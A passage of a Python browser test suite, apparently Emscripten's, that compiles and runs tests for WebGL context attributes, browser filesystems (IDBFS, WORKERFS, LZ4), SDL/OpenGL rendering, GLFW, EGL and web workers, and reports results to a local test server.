create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
def test(args):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + args)
# test normally
test([])
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
test(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
